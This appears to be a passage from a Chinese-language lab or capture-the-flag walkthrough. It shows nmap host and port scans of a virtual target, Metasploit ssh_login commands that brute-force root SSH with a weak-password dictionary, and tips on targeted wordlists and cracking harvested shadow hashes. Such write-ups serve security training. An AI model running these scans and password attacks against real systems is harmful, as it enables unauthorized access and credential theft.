nmap -sP 192.168.23.1/24
其中:
192.168.23.1
是虚拟网卡使用的地址:192.168.23.254
是 DHCP 服务器的地址;192.168.23.138
是攻击机 Kali;192.168.23.2
是虚拟网卡的网关地址:所以综上排除之后,靶机的 IP 为 192.168.23.139
。
nmap -sS -Pn -T4 -p 1-65535 192.168.23.139
使用 msf 的 scanner/ssh/ssh_login
来爆破此靶机的 22 端口:
msfconsole
search scanner/ssh
use scanner/ssh/ssh_login
set RHOSTS 192.168.23.139
set THREADS 200
set Username root
set PASS_FILE /root/Desktop/dic_password_ssh.txt
run
对这种一般环境黑盒测试使用通用字典进行爆破。
字典选择了我在 SNETCracker
这个工具里面扒下来的弱 ssh 密码字典。
根据目标环境ssh用户名设为 root
足矣。
注:SNETCracker
这个工具也很好用,可单用。
虽然 ruby 略慢,最终跑出来了,一无所获:
在此相当于一个纯黑盒环境,所以我用通用字典跑。在一些灰盒环境,可以根据获取的信息,如时间、公司名称缩写、域名称缩写这些信息建立一个针对性的字典。一些公司用户名就是
名称@年份
。
还可以抓 shadow 跑密码,丢到字典里面去,在遇到运维设置不太好的情况下,有时候能够通杀一大片。
1898 端口是一个网站。功能点较为单一、尝试进行信息收集。